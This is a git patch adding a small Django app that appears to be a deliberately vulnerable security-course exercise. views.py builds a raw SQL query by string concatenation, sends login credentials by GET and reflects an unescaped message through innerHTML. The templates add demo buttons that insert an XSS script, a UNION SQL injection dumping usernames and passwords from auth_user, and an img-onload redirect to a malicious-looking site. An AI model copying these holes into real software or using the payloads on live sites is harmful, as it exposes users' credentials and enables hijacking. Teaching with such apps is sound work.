From fe3814b22843083bf0d5191c412c07ce8665e053 Mon Sep 17 00:00:00 2001
From: John Ahlroos <john@ahlroos.me>
Date: Tue, 2 Mar 2021 17:48:37 +0200
Subject: [PATCH] Initial implementation

---
 project1/project1/migrations/__init__.py |  0
 project1/project1/models.py              |  5 +++
 project1/project1/settings.py            |  5 ++-
 project1/project1/urls.py                | 14 ++++++-
 project1/project1/views.py               | 53 ++++++++++++++++++++++++
 project1/templates/index.html            | 45 ++++++++++++++++++++
 project1/templates/login.html            | 23 ++++++++++
 7 files changed, 142 insertions(+), 3 deletions(-)
 create mode 100644 project1/project1/migrations/__init__.py
 create mode 100644 project1/project1/models.py
 create mode 100644 project1/project1/views.py
 create mode 100644 project1/templates/index.html
 create mode 100644 project1/templates/login.html

diff --git a/project1/project1/migrations/__init__.py b/project1/project1/migrations/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/project1/project1/models.py b/project1/project1/models.py
new file mode 100644
index 0000000..39ab547
--- /dev/null
+++ b/project1/project1/models.py
@@ -0,0 +1,5 @@
+from django.db import models
+
+
+class Product(models.Model):
+    name = models.CharField(max_length=30)
diff --git a/project1/project1/settings.py b/project1/project1/settings.py
index 1afffd5..3a10ff9 100644
--- a/project1/project1/settings.py
+++ b/project1/project1/settings.py
@@ -27,6 +27,7 @@ DEBUG = True
 
 ALLOWED_HOSTS = []
 
+LOGIN_REDIRECT_URL = '/'
 
 # Application definition
 
@@ -37,6 +38,7 @@ INSTALLED_APPS = [
     'django.contrib.sessions',
     'django.contrib.messages',
     'django.contrib.staticfiles',
+    'project1'
 ]
 
 MIDDLEWARE = [
@@ -51,10 +53,11 @@ MIDDLEWARE = [
 
 ROOT_URLCONF = 'project1.urls'
 
+TEMPLATE_DIR = os.path.join(BASE_DIR, "templates")
 TEMPLATES = [
     {
         'BACKEND': 'django.template.backends.django.DjangoTemplates',
-        'DIRS': [],
+        'DIRS': [TEMPLATE_DIR],
         'APP_DIRS': True,
         'OPTIONS': {
             'context_processors': [
diff --git a/project1/project1/urls.py b/project1/project1/urls.py
index 97cf4fb..53af268 100644
--- a/project1/project1/urls.py
+++ b/project1/project1/urls.py
@@ -13,9 +13,19 @@ Including another URLconf
     1. Import the include() function: from django.urls import include, path
     2. Add a URL to urlpatterns:  path('blog/', include('blog.urls'))
 """
-from django.contrib import admin
-from django.urls import path
+from django.contrib import admin, auth
+from django.urls import path, include
+from . import views
 
 urlpatterns = [
     path('admin/', admin.site.urls),
+    path('', views.home),
+
+	path('find_product', views.find_product),
+	path('login', views.login),
+	path('do_login', views.do_login),
+	path('logout', views.logout),
+    path('add_product', views.add_product),
+	path('import_products', views.import_products)
+    
 ]
diff --git a/project1/project1/views.py b/project1/project1/views.py
new file mode 100644
index 0000000..8a6d6ce
--- /dev/null
+++ b/project1/project1/views.py
@@ -0,0 +1,53 @@
+from django.http import HttpResponse, HttpResponseRedirect
+from django.shortcuts import render
+from project1.models import Product
+from django.contrib import auth
+from django.contrib.auth.decorators import login_required
+from django import forms
+
+@login_required(login_url='/login')
+def home(request):
+    return render(request, "index.html")
+
+def login(request):
+	return render(request, 'login.html')
+
+def logout(request):
+    auth.logout(request)
+    return HttpResponseRedirect("/")
+
+def do_login(request):
+    username = request.GET.get('username', '')
+    password = request.GET.get('password', '')
+    user = auth.authenticate(username=username, password=password)
+    if user is not None and user.is_active:
+        auth.login(request, user)
+        return HttpResponseRedirect("/")
+    else:
+        return HttpResponseRedirect(f"/login?message={username} not found.")
+
+@login_required(login_url='/login')
+def add_product(request):
+    name = request.POST.get('name', '')
+    product = Product.objects.create(name=name)
+    print('Added product ' + product.name)
+    return HttpResponse(content='Saved product ' + product.name)
+
+def find_product(request):
+    search = request.GET.get('name', '')
+    print('Searching for ' + search)
+    products = Product.objects.raw(
+        "SELECT * FROM project1_Product where name like '%" + search + "%'")
+    return HttpResponse("<br/>".join(map(lambda p: p.name, products)))
+
+@login_required(login_url='/login')
+def import_products(request):
+	form = UploadFileForm(request.POST, request.FILES)
+	if form.is_valid():
+		file = request.FILES['file']
+		return HttpResponseRedirect('/')
+	else:
+		return HttpResponse(content="Upload failed.")
+
+class UploadFileForm(forms.Form):
+    file = forms.FileField()
\ No newline at end of file
diff --git a/project1/templates/index.html b/project1/templates/index.html
new file mode 100644
index 0000000..8099814
--- /dev/null
+++ b/project1/templates/index.html
@@ -0,0 +1,45 @@
+<!DOCTYPE html>
+<html>
+
+<body>
+    <p>
+        <form method="POST" action="/add_product">
+            {% csrf_token %}
+            <label>Add product:</label><br>
+            <input id="add_product" name="name" type="text" />
+            <button type="submit">Submit</button>
+            <a href="#" onClick="xss_inject_attack()">XSS injection attack (steal cookies)</a>
+        </form>
+    </p>
+    <p>
+        <form method="GET" action="/find_product">
+            <label>Find Product by Name</label><br/>
+            <input id="find_product_by_name" name="name" type="text" />
+            <button type="submit ">Search</button>
+            <a href="#" onClick="sql_inject_attack()">Sql injection attack (Get all users of system along with their details)</a>
+        </form>
+    </p>
+    <p>
+        <form method="POST" action="/import_products" enctype="multipart/form-data">
+            {% csrf_token %}
+            <label for="file">Import Products (XML):</label><br>
+            <input name="file" type="file" />
+            <button type="submit ">Submit</button>
+        </form>
+    </p>
+
+    <a href="/logout">Log out</a>
+
+    <script>
+        function xss_inject_attack() {
+            document.querySelector("#add_product").value = "<script>alert('I got your cookie, ha-haa!')</scr" + "ipt>";
+        }
+
+        function sql_inject_attack() {
+            document.querySelector("#find_product_by_name").value = "' AND false UNION ALL select id, username||' '||password||' '||first_name||''||last_name||' '||email from auth_user where username like '";
+        }
+    </script>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/project1/templates/login.html b/project1/templates/login.html
new file mode 100644
index 0000000..e065a7e
--- /dev/null
+++ b/project1/templates/login.html
@@ -0,0 +1,23 @@
+<h2>Log In</h2>
+<form method="GET" action="do_login">
+    <label for="username">Username:</label>
+    <input id="username" type="text" name="username" /><a href="#" onclick="xss_inject()">XSS injection attack (site redirect)</a><br/>
+    <label for="password">Password:</label>
+    <input type="password" name="password" /><br/>
+    <button type="submit">Log In</button>
+
+    <div style="color:red" id=message></div>
+
+    <script>
+        function xss_inject() {
+            var img = "https://www.freepnglogos.com/uploads/hacker-png/hacker-interpol-arrests-suspected-anonymous-hackers-motley-5.png";
+            document.querySelector("#username").value = `<img src="${img}" onload="window.location.href='http://some.malicious.site.com';this.parentNode.removeChild(this);"/>`;
+        }
+        parameters = new URLSearchParams(window.location.search);
+        if (parameters.get('message')) {
+            message = decodeURIComponent(parameters.get('message'));
+            console.log(message);
+            document.querySelector("#message").innerHTML = message;
+        }
+    </script>
+</form>
\ No newline at end of file